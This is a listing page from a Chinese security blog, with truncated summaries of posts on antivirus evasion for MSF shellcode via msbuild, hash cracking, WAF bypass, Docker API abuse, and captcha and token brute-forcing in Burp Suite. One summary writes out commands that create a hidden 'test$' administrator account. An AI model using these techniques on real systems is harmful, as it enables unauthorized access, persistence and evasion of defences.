上一页 1 2 3 4 5 6 7 ··· 40 下一页
摘要: MSF shellcode免杀 nps_payload >python nps_payload.py正常生成 >msfconsole -r msbuild_nps.rc开启监听 >%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe xx.x 阅读全文
posted @ 2022-12-04 16:03 kalibb 阅读(287) 评论(0) 推荐(0)
摘要: 破解网址 https://www.objectif-securite.ch/en/ophcrack http://cracker.offensive-security.com/index.php GoogleColab破解hash 之前在freebuf上看到过相关文章,最近在github上也看到了这 阅读全文
posted @ 2022-12-04 16:02 kalibb 阅读(680) 评论(0) 推荐(0)
摘要: 父进程破坏 命令explorer.exe / root与cmd.exe / c类似,只不过使用explorer会破坏进程树,会创建新实例explorer.exe,使之成为新实例下的子进程 Bypass mod_security Xss和注入bypass mod_security /*!50000%7 阅读全文
posted @ 2022-12-04 16:02 kalibb 阅读(382) 评论(0) 推荐(0)
摘要: 影子用户 >net user test$ test /add >net localgroup administrators test$ /add 注册表HKEY_LOCAL_MACHINE\SAM\SAM\ 给予administrator SAM的完全控制和读取的权限 以下导出为1.reg HKEY 阅读全文
posted @ 2022-12-04 16:01 kalibb 阅读(270) 评论(0) 推荐(0)
摘要: Docker Hacking 未授权API 当系统上安装 docker 时,它将在位于端口 2375 的本地主机上公开一个 API。该 API 可用于与 docker 引擎进行交互,这基本上使您有权在未经身份验证的情况下执行任何您想做的事情。向 /version 端点发出 GET 请求。 将打印出一 阅读全文
posted @ 2022-12-04 16:01 kalibb 阅读(131) 评论(0) 推荐(0)
摘要: Docker概述 Docker为什么会出现 一款产品从开发到上线,从操作系统,到运行环境,再到应用配置。作为开发+运维之间的协作我们需要 关心很多东西,这也是很多互联网公司都不得不面对的问题,特别是各种版本的迭代之后,不同版本环 境的兼容,对运维人员是极大的考验! 环境配置如此麻烦,换一台机器,就要 阅读全文
posted @ 2022-12-04 16:00 kalibb 阅读(69) 评论(0) 推荐(0)
摘要: 因为kali自带proxychains工具 直接修改/etc/proxychains.conf配置文件 直接修改socks4 127.0.0.1 1080 值得注意的是在ssr上开启允许局域网上连接 参考连接:https://www.codenong.com/cs106128501/ https:/ 阅读全文
posted @ 2022-11-24 23:46 kalibb 阅读(600) 评论(0) 推荐(0)
摘要: 1.漏洞原理 验证码使用之后没有销毁,造成复用; 2.使用burpsuit拦截数据包 3.将请求包 4.进行设置 5.根据上面的返回的页面长度,获得后台密码 阅读全文
posted @ 2022-11-24 14:41 kalibb 阅读(98) 评论(0) 推荐(0)
摘要: 1.漏洞原理: 因为不能存在cookie 而且不进行验证,即便删除session也不会影响验证,可以直接绕过验证码验证这个环节,直接对后台的账号和密码进行穷举 2.通过burpsuit进行抓包 3.发送到重发器上免进行验证,当删session会显示用户或密码错误(这里由于我burpsuit中文乱码的 阅读全文
posted @ 2022-11-24 12:38 kalibb 阅读(109) 评论(0) 推荐(0)
摘要: 有的网站后台存在token值,这个token通俗的名字叫令牌,每次刷新页面都会随机变化。提交请求时必须携带这个token值,可以利用这点避免后台进行直接穷举和防止csrf攻击。 burpsuite设置宏获取token对网站后台密码破解 在设置线程的时候一定要设置成1,多线程下会影响最后的返回值长度( 阅读全文
posted @ 2022-11-22 23:21 kalibb 阅读(180) 评论(0) 推荐(0)
上一页 1 2 3 4 5 6 7 ··· 40 下一页